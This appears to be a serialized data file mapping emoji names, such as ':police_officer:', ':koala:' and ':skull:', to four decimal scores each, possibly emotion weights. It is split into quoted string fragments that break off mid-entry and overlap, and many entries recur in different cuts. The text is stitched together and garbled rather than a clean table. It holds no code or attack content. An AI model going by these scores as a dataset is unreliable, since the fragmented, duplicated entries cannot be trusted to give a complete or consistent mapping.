[0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\":", "0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166],", "0.305, 0.19399999999999998], 
\":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\":", "\":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308,", "0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\":", "0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\":", "0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\":", "0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135,", "\":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048,", "\":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003,", "0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998],", "0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\":", "0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\":", "\":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 
0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292,", "[0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184,", "0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092,", "0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\":", "\":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109,", "[0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316,", "0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145],", "0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\":", "0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\":", "0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\":", "0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053,", "[0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136,", "0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 
0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369],", "[0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001,", "0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002],", "0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\":", "\":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999,", "0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177],", "0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\":", "0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\":", "0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\":", "\":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003,", "0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\":", "0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284,", "0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 
0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195,", "0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\":", "[0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326,", "0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142,", "\":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287,", "0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225],", "0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\":", "0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215],", "0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175],", "0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161,", "0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23],", "\":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092,", "\":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": 
[0.203, 0.24100000000000002,", "0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235],", "\":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092,", "\":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259,", "0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\":", "\":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107,", "0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147,", "0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\":", "[0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217,", "0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266,", "0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\":", "[0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287,", "0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 
0.16699999999999998, 0.28600000000000003, 0.168],", "0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\":", "0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204],", "\":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474,", "0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168],", "0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001,", "0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174,", "0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17,", "0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177],", "0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257,", "0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138],", "[0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051,", "[0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331,", "[0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 
0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165,", "\":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223,", "0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\":", "0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153],", "\":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496,", "0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\":", "0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\":", "[0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32,", "0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\":", "[0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149,", "0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295],", "[0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163,", "0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 
0.18600000000000003, 0.217],", "0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057],", "[0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083,", "\":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062,", "[0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267,", "0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001],", "0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447],", "0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203,", "0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156],", "\":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245,", "\":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245,", "0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156,", "\":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], 
\":gem_stone:\": [0.17300000000000001, 0.073,", "0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193,", "0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061],", "0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\":", "0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335],", "[0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174,", "[0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999,", "[0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354,", "0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442,", "0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\":", "0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162,", "[0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245,", "0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 
0.10300000000000001, 0.175],", "\":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29,", "0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\":", "0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\":", "0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\":", "0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159],", "[0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171,", "0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999],", "[0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002,", "0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381,", "[0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142,", "[0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], 
\":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001,", "[0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126,", "0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\":", "\":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132,", "0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21],", "\":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099,", "[0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004,", "0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\":", "0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131,", "0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201,", "0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\":", "0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445,", "[0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 
0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502,", "0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079,", "0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315],", "0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002,", "\":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35,", "\":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268,", "0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18],", "0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002,", "[0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138,", "0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\":", "[0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099,", "0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], 
\":horse_face:\": [0.254,", "0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299],", "0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998,", "0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105,", "\":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002,", "0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264,", "\":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361,", "\":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053,", "\":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998,", "[0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098,", "0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174],", "0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188],", "0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332],", "0.191, 0.22899999999999998, 0.259], 
